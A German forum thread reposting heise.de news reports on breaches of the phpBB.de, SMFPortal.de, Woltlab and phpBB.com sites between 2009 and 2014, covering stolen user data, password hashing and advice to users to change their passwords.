Der Einbruch in das deutsche Support-Forum phpBB.de zieht weitere Kreise. Offenbar hat der vermutlich deutsche Täter mit dem Pseudonym Trada auch das Support-Forum SMFPortal.de der Software Simple Machine Forum (SMF) gehackt und die Datensätze von Anwendern ausgelesen. Hinweisen zufolge nutzte er dafür keine Sicherheitslücke, sondern einen gestohlenen FTP-Account.

Laut Meldung auf SMFPortal soll er dabei ein komplettes Backup gezogen haben. Nach Angaben des SMFPortal-Teams sind darin Nutzernamen, E-Mail-Adressen und die Hashes der Zugangspasswörter enthalten gewesen. Die Nutzer werden dazu aufgefordert, ihre Passwörter auf Seiten zu ändern, auf denen sie dasselbe zum Log-in benutzen.

Ob der Täter die Passwörter überhaupt aus den Hashes ermitteln kann, ist fraglich, denn anders als bei phpBB.de nutzt SMF eigentlich Hashes mit Salts, sodass etwa der Angriff mittels vorberechneter Rainbow Tables nicht funktioniert. Allerdings enthielt das Backup auch Private Messages, in denen Nutzer möglicherweise Zugangsdaten im Klartext ausgetauscht haben.

Auch die Daten vom SMFPortal hat der Täter wie schon bei phpBB.de und Woltlab zunächst auf h4ck-y0u.org zum Verkauf angeboten, seine Offerte jedoch aufgrund "des derzeitigen Rummels" wieder zurückgezogen. Bei SMFPortal soll es sich nur um 1400 Datensätze gehandelt haben, während es bei phpBB.de über 80.000 und bei Woltlab über 30.000 gewesen sein sollen. Auch bei Woltlab soll anders als bei phpBB.de keine Sicherheitslücke im Spiel gewesen sein. Zudem nutzt Woltlab zur Speicherung der Passwörter Hashes mit Salt. Bei phpBB.de war dies erst mit der anstehenden Migration auf phpBB 3 geplant.

Alle drei Board-Betreiber haben Strafanzeige erstattet.

Quelle : www.heise.de

Titel: Einbruch in Webseite von Boardsoftware phpBB
Beitrag von: SiLæncer am 05 Februar, 2009, 11:35

Die Webseite der populären Boardsoftware phpBB ist derzeit aufgrund eines Einbruchs nicht zu erreichen. Beim Aufruf erscheint nur der Hinweis, dass jemand durch eine veraltete Version der Newsletter-Management-Software PHPList eingedrungen sei. phpBB.com und dazugehörige Seiten seien bis zur Wiederherstellung nicht zu erreichen. Nach Angaben des Internet Storm Centers (ISC) konnte der Eindringling E-Mail-Adressen und die verschlüsselten Passwörter aller Nutzer auslesen.

Offenbar hat der Angreifer eine seit dem 14. Januar bekannte Local-File-Inclusion-Schwachstelle ausgenutzt, um die Daten auf dem Server auszulesen. Zwar haben die Entwickler von PHPList die Lücke am 29. Januar mit Version 2.0.19 geschlossen. Vermutlich hatte der Angreifer aber bereits zuvor Zugriff auf die Daten. Laut ISC soll er die Daten veröffentlicht haben. Ob er Zugang zum phpBB-Server hatte, ist nicht bekannt.

In phpBB sind nach Angaben der Entwickler keine Lücken bekannt. Zwar ist die Webseite nicht zu erreichen, wer aber die Software herunterladen möchte, kann dies über www.ohloh.net/p/phpbb tun.

Quelle : http://www.heise.de/newsticker/Einbruch-in-Webseite-von-Boardsoftware-phpBB--/meldung/126929

Titel: PhpBB-Webserver geknackt, Zugangsdaten kopiert
Beitrag von: SiLæncer am 18 Dezember, 2014, 13:54

Die PhpBB-Server wurden kompromittiert und sind momentan offline. Die Angreifer haben es geschafft, den Foren-Zugang eines Administrators zu kapern.

(http://3.f.ix.de/scale/geometry/600/q75/imgs/18/1/4/0/4/6/6/0/phpbb-downtime-3b87d8871d033588.png)

Die Webseite der beliebten freien Forensoftware PhpBB ist seit dem Wochenende offline. Die Betreiber des Projektes haben nun mitgeteilt, dass Angreifer es geschafft haben, über den Foren-Zugang eines Administrators in die Server einzusteigen. Downloads der Software seien zu keiner Zeit kompromittiert worden. Allerdings haben es die Angreifer geschafft, die kompletten Datenbanken des phpbb.com-Forums und der Test-Installation area51.phpbb.com zu kopieren.

Laut den Entwicklern wurden nur gesalzene Hashes der Passwörter kopiert. Nutzer sollen sich aber überlegen, ob sie ihre Passwörter bei anderen Seiten nicht aus Vorsicht trotzdem ändern wollen, falls sie das PhpBB-Passwort dort auch benutzt haben. Es sei nicht auszuschließen, dass die Angreifer es irgendwann schaffen, die Hashes zu knacken. Zusätzlich haben die Angreifer bei Logins der Foren zwischen dem 12. und 15. Dezember alle Passwörter im Klartext mitgeschrieben. Nutzer, die sich in diesem Zeitraum angemeldet haben, sollten auf jeden Fall ihre Passwörter ändern.

Momentan setzen die PhpBB-Betreiber nach eigenen Angaben ihre Webserver neu auf. Wenn das abgeschlossen ist, wollen sie weitere Details zu den Angriffen bekanntgeben.

Quelle : www.heise.de